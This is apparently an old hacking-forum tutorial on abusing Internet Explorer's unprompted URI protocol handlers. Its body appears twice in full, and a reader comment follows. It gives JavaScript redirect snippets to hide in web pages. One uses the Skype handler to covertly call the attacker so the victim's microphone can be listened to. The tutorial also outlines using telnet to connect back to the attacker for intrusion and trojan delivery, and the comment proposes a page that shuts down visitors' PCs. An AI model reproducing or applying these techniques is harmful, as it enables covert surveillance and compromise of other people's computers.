Main:
What the IE exploit is, how to use it, how to hide it and what you can do. Examples. Script kiddies beware, this article is engineered only to give enough to be just that script kiddies, the hardcore stuff you've got to learn yourself.
-=IE Exploit=-
Ok, this exploit isn't exactly the newest in the book, but it's still valid and hasn't been
patched(thanks Microsoft.) So basically this exploit allows us to remotely run programs on
computers via a web page. So let's dig in.
We'll start with a bit of stuff you should know:
Open up IE and in the URL bar type "C:"
Wow, IE just turned into a windows explorer(sorta.)
Isn't that intresting? Well, what if we could run other programs that way...what could we do?
Think about anysite you've been to that allows you to open an aim window to someone. Ever
looked at the hyperlink text?
It looks something like this:
aim:goIm?screenname=tikprog&message=hello+world
okay, lets break that up a bit.
we've got 3 parts to this
aim:
goIm?
screenname=tikprog&message=hello+world
ok, the aim part tells the browser what program to use, various programs have this,
aim:
yahoo:
irc:
ect....
next we have goIM? look like php to anyone but me? yeah....similar. it's the command. aim
has alot of these:
goIm?
goAway?
and lots of others (google "aim:goIM?" and it should give you a nice list)
and finally, those of you who know php will know this already, the last bit are the
parameters...that will send it to me with "hello world" in it. I'm not going to explain aim
scripting(if you can even call it that, google is your friend, or if you beg maybe I'll write a
"scripting for various things" article).
Okay, to the important part here the "aim:" part. Now, if Aim has this, and as I've said so
does yahoo and IRC, what else may have it? Well, I know for a fact alot of things do...I'll
give some examples later, but first I want you to learn a bit...because that is what being a
hacker is about.
The reason this is good for IE and not other browsers(yay for FireFox!) is that IE doesn't
prompt you for confirmation that you want to run this script, FireFox prompts you with a nice
little box. Now, this become a dangerous exploit when you realize that some other
programs that are more dangerous than AIM or IRC have this property. Let's
say....oh....command, telnet, regedit. Now, for command and regedit I'm only going to show
howto access them, using them is much more difficult and I'm not giving that up so a bunch
of script kiddies can flood the next with destructive webpages. Those of you how actually
figure it out I'm hoping are not going to kill the world. These pages can do ALOT of damage
and I in no way advocate them for destructive, but there is a way(that I will show) to use
them to gain some nice access and play some fun tricks.
With that being said....let's move on to the next topic. So now you have half a clue what's
up with this exploit. If you've been paying attention you may be thinking to yourself "<insert
prefered name here> don't they have to click a hyperlink? Who's dumb enough to do that?"
Thankfully, the Samurai has put 2 and 2 together(and gotten 5....read 1984, seriously) and
made a nice little script to do that too. So, I'm not explaining how Jscripts work, just going
to show you the code and give a brief explaination...if you don't know Jscripts....GO LEARN
DAMNIT. so here's my code
<script>
window.location="aim:goIm?screenname=tikprog&message=hello+world";
</script>
So, what does this do? I redirects the page to that URL, which isn't a URL, just a nice little
command. Embed this in a webpage and noone will notice...no change is made...it just runs
nicely.
So....now your thinking "...but Samurai, who care about putting an AIM message script in."
and again ye of little faith, I am some fun with this. I'll give you a few nice ones.
For snooping:
There is a nice little messaging program out there, skype (www.skype.com I would
recommend it. It's encrypted, allows VoIP, has rocking emoticons type "(finger)" for a
hidden one, and just kicks AIMs butt), most important is VoIP. So, let's say you get your
friend ( or whoever you want to snoop on.) Next go nab the source from a trusted site. I like
google. And build a webpage on it (make sure you change the picture source so they show
up) and place it in something like geocities with embedded code and use aim to hide the
link by putting fake text (html works nicely too) with the URL.
Skype's command works like this:
skype:
and you put the parmater where the command went and the command where the parameter
was.... username?call.
so embed this code:
<script>
window.location="skype:username?call";
</script>
And then answer the call. If they have a mic it will turn on and you can listen in.
Now, as promised the reason for this...intrusion!
Build a similar page and we're using our friend telnet. Your going to need my simple trojan
article, or build a socket reciever in VB or whatever you want. Now this only works if you
can get a REAL IP address for yourself. If your behind a router(or they are) it may not work.
So we all know our friend telnet. So your code needs to open telnet to your IP address on
the port you want. Telnet has a slightly different protocal to use here (think like command
line) and use that in the Jscript code. I'm not giving you the whole thing...I want YOU to
learn and to make sure not everyone does this.
So just think...using command, regedit, *nix you could open ports, run other apps,
download trojans. And with a bit of creativity possibly gain some new access.
Enjoy.
Ok, this exploit isn't exactly the newest in the book, but it's still valid and hasn't been
patched(thanks Microsoft.) So basically this exploit allows us to remotely run programs on
computers via a web page. So let's dig in.
We'll start with a bit of stuff you should know:
Open up IE and in the URL bar type "C:"
Wow, IE just turned into a windows explorer(sorta.)
Isn't that intresting? Well, what if we could run other programs that way...what could we do?
Think about anysite you've been to that allows you to open an aim window to someone. Ever
looked at the hyperlink text?
It looks something like this:
aim:goIm?screenname=tikprog&message=hello+world
okay, lets break that up a bit.
we've got 3 parts to this
aim:
goIm?
screenname=tikprog&message=hello+world
ok, the aim part tells the browser what program to use, various programs have this,
aim:
yahoo:
irc:
ect....
next we have goIM? look like php to anyone but me? yeah....similar. it's the command. aim
has alot of these:
goIm?
goAway?
and lots of others (google "aim:goIM?" and it should give you a nice list)
and finally, those of you who know php will know this already, the last bit are the
parameters...that will send it to me with "hello world" in it. I'm not going to explain aim
scripting(if you can even call it that, google is your friend, or if you beg maybe I'll write a
"scripting for various things" article).
Okay, to the important part here the "aim:" part. Now, if Aim has this, and as I've said so
does yahoo and IRC, what else may have it? Well, I know for a fact alot of things do...I'll
give some examples later, but first I want you to learn a bit...because that is what being a
hacker is about.
The reason this is good for IE and not other browsers(yay for FireFox!) is that IE doesn't
prompt you for confirmation that you want to run this script, FireFox prompts you with a nice
little box. Now, this become a dangerous exploit when you realize that some other
programs that are more dangerous than AIM or IRC have this property. Let's
say....oh....command, telnet, regedit. Now, for command and regedit I'm only going to show
howto access them, using them is much more difficult and I'm not giving that up so a bunch
of script kiddies can flood the next with destructive webpages. Those of you how actually
figure it out I'm hoping are not going to kill the world. These pages can do ALOT of damage
and I in no way advocate them for destructive, but there is a way(that I will show) to use
them to gain some nice access and play some fun tricks.
With that being said....let's move on to the next topic. So now you have half a clue what's
up with this exploit. If you've been paying attention you may be thinking to yourself "<insert
prefered name here> don't they have to click a hyperlink? Who's dumb enough to do that?"
Thankfully, the Samurai has put 2 and 2 together(and gotten 5....read 1984, seriously) and
made a nice little script to do that too. So, I'm not explaining how Jscripts work, just going
to show you the code and give a brief explaination...if you don't know Jscripts....GO LEARN
DAMNIT. so here's my code
<script>
window.location="aim:goIm?screenname=tikprog&message=hello+world";
</script>
So, what does this do? I redirects the page to that URL, which isn't a URL, just a nice little
command. Embed this in a webpage and noone will notice...no change is made...it just runs
nicely.
So....now your thinking "...but Samurai, who care about putting an AIM message script in."
and again ye of little faith, I am some fun with this. I'll give you a few nice ones.
For snooping:
There is a nice little messaging program out there, skype (www.skype.com I would
recommend it. It's encrypted, allows VoIP, has rocking emoticons type "(finger)" for a
hidden one, and just kicks AIMs butt), most important is VoIP. So, let's say you get your
friend ( or whoever you want to snoop on.) Next go nab the source from a trusted site. I like
google. And build a webpage on it (make sure you change the picture source so they show
up) and place it in something like geocities with embedded code and use aim to hide the
link by putting fake text (html works nicely too) with the URL.
Skype's command works like this:
skype:
and you put the parmater where the command went and the command where the parameter
was.... username?call.
so embed this code:
<script>
window.location="skype:username?call";
</script>
And then answer the call. If they have a mic it will turn on and you can listen in.
Now, as promised the reason for this...intrusion!
Build a similar page and we're using our friend telnet. Your going to need my simple trojan
article, or build a socket reciever in VB or whatever you want. Now this only works if you
can get a REAL IP address for yourself. If your behind a router(or they are) it may not work.
So we all know our friend telnet. So your code needs to open telnet to your IP address on
the port you want. Telnet has a slightly different protocal to use here (think like command
line) and use that in the Jscript code. I'm not giving you the whole thing...I want YOU to
learn and to make sure not everyone does this.
So just think...using command, regedit, *nix you could open ports, run other apps,
download trojans. And with a bit of creativity possibly gain some new access.
Enjoy.
Posted by 
Making a .swf to execute the code could lead to lot of entertainment aswell (imagine people's pcs shutting down everytime they opened your myspace page...)
. And I'm glad you didn't just spoon feed skiddies how to do it. Very good job 
.
